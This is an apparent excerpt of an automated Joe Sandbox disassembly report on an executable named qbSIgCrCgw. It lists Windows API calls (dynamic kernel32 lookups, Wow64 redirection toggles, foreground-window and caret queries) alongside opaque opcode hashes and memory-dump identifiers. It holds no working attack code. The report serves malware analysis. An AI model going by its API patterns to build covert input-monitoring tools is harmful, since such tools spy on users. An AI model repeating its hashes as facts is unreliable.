                                                                                • Instruction Fuzzy Hash: 05E0B674946300EBDB216F61FD0DB053A64F714706F511435F10DE21B0DBFA94A09A5D
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: LocalTime__swprintf
                                                                                • String ID: %.3d$WIN_XPe
                                                                                • API String ID: 2070861257-2409531811
                                                                                • Opcode ID: 74df3e601d89268f7c6792d13dbecef9d78c58db5f06ffc2f4089f44ae532e6b
                                                                                • Instruction ID: a17cfa02744bc49da1271fc35cf657a7c267c13dcb1c46e9abc3671285de0df9
                                                                                • Opcode Fuzzy Hash: 74df3e601d89268f7c6792d13dbecef9d78c58db5f06ffc2f4089f44ae532e6b
                                                                                • Instruction Fuzzy Hash: F9E01271904628EBCB129751ED05EFA737CAB04741FA004D3FD06E2110E7399BA5AB1B
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,004121FB,?,004123EF), ref: 00412213
                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00412225
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetProcessId$kernel32.dll
                                                                                • API String ID: 2574300362-399901964
                                                                                • Opcode ID: 2751c7de454ccc5bb3a1c918f5b56d22de91b32b6d9a53aedd6bfd354c7b48d7
                                                                                • Instruction ID: d8df791b77755a0a22882a507f179023b0b396a038ab089afabf9945cbd8473a
                                                                                • Opcode Fuzzy Hash: 2751c7de454ccc5bb3a1c918f5b56d22de91b32b6d9a53aedd6bfd354c7b48d7
                                                                                • Instruction Fuzzy Hash: 4CD0A734800712AFCB214F30F90874677D4EB04304B10587BE842E2250E7F8D8C08658
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000000,003B42EC,?,003B42AA,?), ref: 003B4304
                                                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 003B4316
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                • API String ID: 2574300362-1355242751
                                                                                • Opcode ID: ede5466f99fccd9f0a201313d7e2cc57f394ee7860467375fc46fa4128bab33e
                                                                                • Instruction ID: 270eb5ef94f5d96b5f1d54dbfc92cbfa95ba099b985844bbcdfbe55ecacf14e6
                                                                                • Opcode Fuzzy Hash: ede5466f99fccd9f0a201313d7e2cc57f394ee7860467375fc46fa4128bab33e
                                                                                • Instruction Fuzzy Hash: 78D0A774900B12AFCB214F20F80C74176D4AB04305B15443BE545D2565E7B4CC808A58
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,003B41BB,003B4341,?,003B422F,?,003B41BB,?,?,?,?,003B39FE,?,00000001), ref: 003B4359
                                                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 003B436B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                • API String ID: 2574300362-3689287502
                                                                                • Opcode ID: 2668e3e75eb1ae8faeb5d731955f77e02fbb70e99c48f849ae25a1b92df00734
                                                                                • Instruction ID: a65882bb423013e201e03f5cd2a2fa5bc92f8ebbbe40b5de308990c8d3a0835f
                                                                                • Opcode Fuzzy Hash: 2668e3e75eb1ae8faeb5d731955f77e02fbb70e99c48f849ae25a1b92df00734
                                                                                • Instruction Fuzzy Hash: D8D0A774800722AFCB214F30F808B4176D4AB10719B15443BE485D2550E7B4D8808E58
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(oleaut32.dll,?,003F051D,?,003F05FE), ref: 003F0547
                                                                                • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 003F0559
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                • API String ID: 2574300362-1071820185
                                                                                • Opcode ID: 5a88af1ee769b803f3453dcd5f3925edda1f6c9d8435bd1f10e4ac6d690194ea
                                                                                • Instruction ID: a54755f1b926756df094979b0dfd68b08a4e8a68301470fb593ccd4b3bc99c9d
                                                                                • Opcode Fuzzy Hash: 5a88af1ee769b803f3453dcd5f3925edda1f6c9d8435bd1f10e4ac6d690194ea
                                                                                • Instruction Fuzzy Hash: 7AD0A730804B22AFCB248F24F80871576E4AB01301B21C43EE44AD2155E6F4C8808A54
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,003F052F,?,003F06D7), ref: 003F0572
                                                                                • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 003F0584
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                • API String ID: 2574300362-1587604923
                                                                                • Opcode ID: c3eee86b20f07c39961cd37e2a83381039c37392e087f73ac2267bf93e727325
                                                                                • Instruction ID: f98795c49df26a7d5fb1bc372006a137a8c9ee5335483a773fffcadf9e6abddb
                                                                                • Opcode Fuzzy Hash: c3eee86b20f07c39961cd37e2a83381039c37392e087f73ac2267bf93e727325
                                                                                • Instruction Fuzzy Hash: 77D0A730804716AFCB245F34F948B1277E4AB05301B21843EE945D2154E7F4C4C48A64
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,0040ECBE,?,0040EBBB), ref: 0040ECD6
                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0040ECE8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                • API String ID: 2574300362-1816364905
                                                                                • Opcode ID: 786989666fc364ccb94fd038ecb22e18b8d43a3a2bd655c6fa1941d7880a90ce
                                                                                • Instruction ID: 3877cc7085db2e9cab3db201c6e8bb9a5ba64a121a674e6eae71cac74c4775c9
                                                                                • Opcode Fuzzy Hash: 786989666fc364ccb94fd038ecb22e18b8d43a3a2bd655c6fa1941d7880a90ce
                                                                                • Instruction Fuzzy Hash: 4BD0A730805723EFDF205F61F84870377E4AB00300B14883BF846E2290EFB8C8809658
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0040BAD3,00000001,0040B6EE,?,0044DC00), ref: 0040BAEB
                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0040BAFD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                                                • API String ID: 2574300362-199464113
                                                                                • Opcode ID: 86d7dbaee6fc713320586c1e7985f0939c20789108d7cea4fb3d26d3d72074fe
                                                                                • Instruction ID: cc04ab630f93da2cca7f72d3fc5651f68e006574bc5b599b62fa5807ddfe0b6f
                                                                                • Opcode Fuzzy Hash: 86d7dbaee6fc713320586c1e7985f0939c20789108d7cea4fb3d26d3d72074fe
                                                                                • Instruction Fuzzy Hash: 0FD0A730C10B129FCB309F20F848B1277E4EB00300B10443BE843E2694E7B8D880C69D
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,00413BD1,?,00413E06), ref: 00413BE9
                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00413BFB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                • API String ID: 2574300362-4033151799
                                                                                • Opcode ID: c5e1bc080f9400f44e8a1b569b2de4f86efe2a13e068a614921c68504e1b2eee
                                                                                • Instruction ID: 6e4ed54b8a15dab654b5881f70e615417749761ebe3cab3a823c3f5857d15079
                                                                                • Opcode Fuzzy Hash: c5e1bc080f9400f44e8a1b569b2de4f86efe2a13e068a614921c68504e1b2eee
                                                                                • Instruction Fuzzy Hash: 79D0C7759007529FDF205FA5F808743FAF4AB45715B20543BE456F2254F6BCD4C08E99
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ed128e4de157ab28c6501d0d8eec56dfeccb61256df87924bfd02f264789f4b7
                                                                                • Instruction ID: e6a76905e35c25cd1192a1523429dededed07693dd76da6663004a75c7905175
                                                                                • Opcode Fuzzy Hash: ed128e4de157ab28c6501d0d8eec56dfeccb61256df87924bfd02f264789f4b7
                                                                                • Instruction Fuzzy Hash: 4EC17D75A0026AEFCB15DF95C884BAEB7B5FF88700F214699E905AF291D730DE41CB90
APIs
• CoInitialize.OLE32(00000000), ref: 0040AAB4
• CoUninitialize.OLE32 ref: 0040AABF
  • Part of subcall function 003F0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 003F027B
• VariantInit.OLEAUT32(?), ref: 0040AACA
• VariantClear.OLEAUT32(?), ref: 0040AD9D
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
• String ID:
• API String ID: 780911581-0
• Opcode ID: 7ba7b97a05cb9207471c7a62924ceba4f28dcfb0a596ad4e71cb2385e28a1dd2
• Instruction ID: 59ab11d870dbcf1768dd05be147950ea654dc34bcf466be08162764cd7851812
• Opcode Fuzzy Hash: 7ba7b97a05cb9207471c7a62924ceba4f28dcfb0a596ad4e71cb2385e28a1dd2
• Instruction Fuzzy Hash: A9A15B352087019FDB11DF14C481B5AB7E5BF89714F14845AFA9AAB3A2CB34FD05CB8A
APIs
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: Variant$AllocClearCopyInitString
• String ID:
• API String ID: 2808897238-0
• Opcode ID: 68a75e0c85db03a12cfe10de9a2d3c2850a965373ff17ea46560c6fba0cd48c6
• Instruction ID: 1f5ed6f80830ba6236952213ddb573096df8a7c96515549e5eab9d2fffe2c8bd
• Opcode Fuzzy Hash: 68a75e0c85db03a12cfe10de9a2d3c2850a965373ff17ea46560c6fba0cd48c6
• Instruction Fuzzy Hash: B551E438A003569BDB369F67D491B6EB3E9EF48314F30891FE646DB6D1DB7098408705
APIs
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: _memset$__filbuf__getptd_noexit_memcpy_s
• String ID:
• API String ID: 3877424927-0
• Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
• Instruction ID: 404f2ed00f6fc53dec0ed41f007cbbc6978797d41939356c9c04d172571d9cda
• Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
• Instruction Fuzzy Hash: 2C51F6B2A00705ABCB268F69A88466E77A5AF40320F25872BF835963D0D770DF50DB52
APIs
• GetWindowRect.USER32(00F56E10,?), ref: 0041C544
• ScreenToClient.USER32(?,00000002), ref: 0041C574
• MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0041C5DA
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
• API String ID: 3880355969-0
• Opcode ID: ca0c56a2ad7d609db7950929a1aa74e0ad0850def5984b098fe16869a8692188
• Instruction ID: 59389a6fafd8477c674e3c74b47f1dfb63fe9b7cb37837790cf18ccbe5645aa2
• Opcode Fuzzy Hash: ca0c56a2ad7d609db7950929a1aa74e0ad0850def5984b098fe16869a8692188
• Instruction Fuzzy Hash: 51514E75900104AFCF10DF68DCC1AEE77B6EB55720F10865AF9699B290D734ED81CB94
APIs
• SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 003EC462
• __itow.LIBCMT ref: 003EC49C
  • Part of subcall function 003EC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 003EC753
• SendMessageW.USER32(?,0000110A,00000001,?), ref: 003EC505
• __itow.LIBCMT ref: 003EC55A
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: MessageSend$__itow
• String ID:
• API String ID: 3379773720-0
• Opcode ID: 7bd488cc1c8aa0483ed55827e08a6f91a65b63ef1a12bcd3cf654e977b6829bf
• Instruction ID: 58cae86c1a3c08e7c7a41a46ba2072b7984b7694612f31f444444614fe79df47
• Opcode Fuzzy Hash: 7bd488cc1c8aa0483ed55827e08a6f91a65b63ef1a12bcd3cf654e977b6829bf
• Instruction Fuzzy Hash: A241E971A00658AFDF23DF56C852BEE7BB9AF45704F001019FA05AB2C1DB749A46CF51
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0041B5D1
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
• Opcode ID: 417096996eb5f6cba6822536f33256b63b67a57a471f2256b2cddc5c621e9e33
• Instruction ID: c94ee7ef58490aedd7901e99eec48406c3660d50ec288b3bda5dd114de98df0f
• Opcode Fuzzy Hash: 417096996eb5f6cba6822536f33256b63b67a57a471f2256b2cddc5c621e9e33
• Instruction Fuzzy Hash: 8E31DE74601208BBEB209F18CC85FEA3766EB25354F648117FA11D62E1C738A9C18BDE
APIs
• ClientToScreen.USER32(?,?), ref: 0041D807
• GetWindowRect.USER32(?,?), ref: 0041D87D
• PtInRect.USER32(?,?,0041ED5A), ref: 0041D88D
• MessageBeep.USER32(00000000), ref: 0041D8FE
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
• Opcode ID: c95dc45acf15599c7fe3ba78ff73cc6e40902260218da17159e6f230e7745ced
• Instruction ID: 3b83f3c362a9d216943c24b0057aff06376b1f290ec6b541a9322cc1e52756a3
• Opcode Fuzzy Hash: c95dc45acf15599c7fe3ba78ff73cc6e40902260218da17159e6f230e7745ced
• Instruction Fuzzy Hash: A2418DB0E00218DFCB11EF59D884BE97BB5FF44315F1881AAE4299B360D334E985CB48
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003E4038
• __isleadbyte_l.LIBCMT ref: 003E4066
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 003E4094
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 003E40CA
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: dac37b9201e16ef5db33c6a41639669e22cc2658ee364294908cc11382621b3a
• Instruction ID: 71e822f199a636cde8a4dd22a5fbfc11410ec189e132fa3fec1fa93329e097d0
• Opcode Fuzzy Hash: dac37b9201e16ef5db33c6a41639669e22cc2658ee364294908cc11382621b3a
• Instruction Fuzzy Hash: 4031B4315002A5EFDF229F76C844B6ABBA9BF44310F164639E6558B1D1E731DC90D790
APIs
• GetForegroundWindow.USER32 ref: 00417CB9
  • Part of subcall function 003F5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 003F5F6F
  • Part of subcall function 003F5F55: GetCurrentThreadId.KERNEL32 ref: 003F5F76
  • Part of subcall function 003F5F55: AttachThreadInput.USER32(00000000,?,003F781F), ref: 003F5F7D
• GetCaretPos.USER32(?), ref: 00417CCA
• ClientToScreen.USER32(00000000,?), ref: 00417D03
• GetForegroundWindow.USER32 ref: 00417D09
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
